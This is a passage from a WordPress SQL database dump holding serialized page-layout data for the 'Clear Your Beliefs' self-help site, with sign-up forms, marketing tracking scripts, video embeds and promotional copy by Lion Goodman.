name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1208:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br><br><br><br>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1352, 1799, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1686:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<br /><br />&lt;center style="margin-bottom: -30px; margin-top: 15px;"&gt;&lt;img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /&gt;&lt;/center&gt;<br />&lt;p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"&gt;&lt;strong&gt;Download the free eBook.&lt;/strong&gt;&lt;/p&gt;<br /><br />&lt;form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"&gt;&lt;input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /&gt;&lt;input name="infusionsoft_version" type="hidden" value="1.35.0.43" /&gt;<br />&lt;div class="infusion-field"&gt;&lt;label class="form-label" for="inf_field_FirstName"&gt;FIRST NAME *&lt;/label&gt;<br />&lt;input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /&gt;&lt;/div&gt;<br />&lt;div class="infusion-field"&gt;&lt;label class="form-label" for="inf_field_Email"&gt;EMAIL *&lt;/label&gt;<br />&lt;input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /&gt;&lt;/div&gt;<br />&lt;div class="form-input-container-button"&gt;&lt;input class="form-input-button" type="submit" value="GET ACCESS NOW" /&gt;&lt;/div&gt;<br />&lt;/form&gt;&lt;script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"&gt;&lt;/script&gt;<br />[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}}s:10:"grid_cells";a:4:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}}}'),
(1355, 1802, 'panels_data', 'a:3:{s:7:"widgets";a:4:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1207:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}}s:10:"grid_cells";a:4:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1353, 1800, 'panels_data', 'a:3:{s:7:"widgets";a:4:{i:0;a:6:{s:3:"url";s:127:"http://pdl.vimeocdn.com/16811/544/307601254.mp4?token2=1416450601_9d98a208a80cfdef258e7d4117c15622&aksessionid=e225207db7d39688";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"0";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1498:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2185:"<p>[10:44:27 AM] Reuben Limos: [su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1228:"<p>[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]</p><div style="height: auto; width: 100%;"><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><p><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}}s:10:"grid_cells";a:4:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}}}'),
(1348, 1797, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:6:{s:3:"url";s:45:"//player.vimeo.com/video/109282065?autoplay=1";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}}s:5:"grids";a:1:{i:0;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:1:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}}}'),
(1349, 1798, '_wp_attached_file', '2014/11/307601254.mp4'),
(1350, 1798, '_wp_attachment_metadata', 'a:9:{s:8:"filesize";i:23132125;s:9:"mime_type";s:15:"video/quicktime";s:6:"length";i:255;s:16:"length_formatted";s:4:"4:15";s:5:"width";i:640;s:6:"height";i:360;s:10:"fileformat";s:3:"mp4";s:10:"dataformat";s:9:"quicktime";s:5:"audio";a:7:{s:10:"dataformat";s:3:"mp4";s:5:"codec";s:19:"ISO/IEC 14496-3 AAC";s:11:"sample_rate";d:48000;s:8:"channels";i:2;s:15:"bits_per_sample";i:16;s:8:"lossless";b:0;s:11:"channelmode";s:6:"stereo";}}'),
(1351, 1798, '_edit_lock', '1416451256:2'),
(1388, 1829, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1855:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1222:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" 